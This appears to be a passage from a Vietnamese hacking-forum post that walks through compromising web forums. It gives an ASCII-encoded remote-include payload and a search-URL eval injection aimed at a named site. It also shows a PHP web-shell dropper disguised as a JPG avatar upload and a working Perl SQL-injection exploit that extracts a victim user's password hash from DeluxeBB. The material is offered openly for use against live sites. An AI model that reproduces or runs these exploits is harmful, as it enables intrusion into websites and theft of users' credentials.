(122).CHR(47).CHR(117).CHR(112).CHR(108).CHR(111).
CHR(97).CHR(100).CHR(115).CHR(47).CHR(97).CHR(118)
.CHR(45).CHR(56).CHR(53).CHR(46).CHR(106).CHR(112) .CHR(103))); //
Lưu ý : Các ASCII trên là link con backdoor của mình , chỗ này convert hơi mệt
nhĩ
POst song vào "SEARCH" rồi search với từ khóa : " langtuelval " nhưng nhớ phần
"Search Options" chỗ "Result Type" chọn "Show results as posts" !
Search 1 phát nó open luôn topic mới nãy mình mới post , rồi nhìn lên address có
dạng :
thptbmt.biz/index.php?act=Search&CODE=show&searchid=377eb74395
7288d34ec63034d6b558a2&search_in=posts&result_type
=posts&highlite=langtueval
thêm vào đằng sau link : &lastdate=z|eval.*?%20//)%23e%00
thành : thptbmt.biz/index.php?act=Search&CODE=show&searchid=377eb74395
7288d34ec63034d6b558a2&search_in=posts&result_type
=posts&highlite=langtueval&lastdate=z|eval.*?%20//)%23e%00
Khi run link này nó sẽ include tới link backdoor mà ta đã chuyển về dạng ASCII ở
trên !
Thía là song
Nhưng mình lại ko rành mí remv này ! híc ! Nên khi làm như cách trên mình ứh
mần ăn được gì cả nên nghĩ ra cách khác chơi hihi !
Làm theo lời bác : IceShaman
Lợi dụng chỗ up avatar ( nếu forum nào ko kĩ sẽ cho mem có quyền upload avatar
lên ) !
UP 1 avatar mang tên langtu.JPG với nội dung thía lày :
CODE
<?
$file=fopen("./uploads/upload.php",w);
$content="<form enctype='multipart/form-data' action='upload.php'
method='POST'>"
."<input type='hidden' name='MAX_FILE_SIZE' value='10000000' />Choose a
file to upload: <input name='uploadedfile' type='file' />"
."<br /><input type='submit' value='Upload File' /></form>"
."<?if (!isset("."$"."HTTP_POST_VARS['MAX_FILE_SIZE'])) { die();}"
."$"."target_path = './'; "."$"."target_path = "."$"."target_path . basename(
"."$"."_FILES['uploadedfile']['name']); "
."if(move_uploaded_file("."$"."_FILES['uploadedfile']['tmp_name'],
"."$"."target_path)) { echo 'OK '; } "
."else{ echo 'There was an error uploading the file, please try again!'; }?>";
if (fwrite($file, $content) === FALSE) {
echo "Cannot write to file ";
exit;
}
echo "Success";
fclose($file);
?>
Như đoạn code trên nó sẽ ghi ra 1 file upload.php với chức năng UPLOAD mà
phải hem hihi !
Sau đó edit lại cái link ASCII thành cái link avatar mà mình mới up lên ( thường
thì có dạng link.com/forum/uploads/av-xx.jpg )
tiếp :
Up 1 con remv mới lên Sữ dụng OK
Cách của lt chỉ mang tính chắc ăn thôi Vì mình làm cách trên kia ko được nên
mới dài dòng như thía này !
Nếu dùng cách trên như tut video thì hy có thể thữ nó tại đây :
để dịch link qua dạng ascii bạn vào : www.haylam.com/lhav/decoder.php
nhét link remv dạng .jpg mà bạn mới up vào và nhất String > ASCII
langtuhaohoa(HCE)
Some Remote SQL Injection Exploit
Trích:
#!/usr/bin/perl
use IO::Socket;
print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
################################################## ####
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "
\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "
\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT \r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY \r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print " [ REPORT ]
\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print " \r\n";
}
exit();
}
}
print "
\r\n";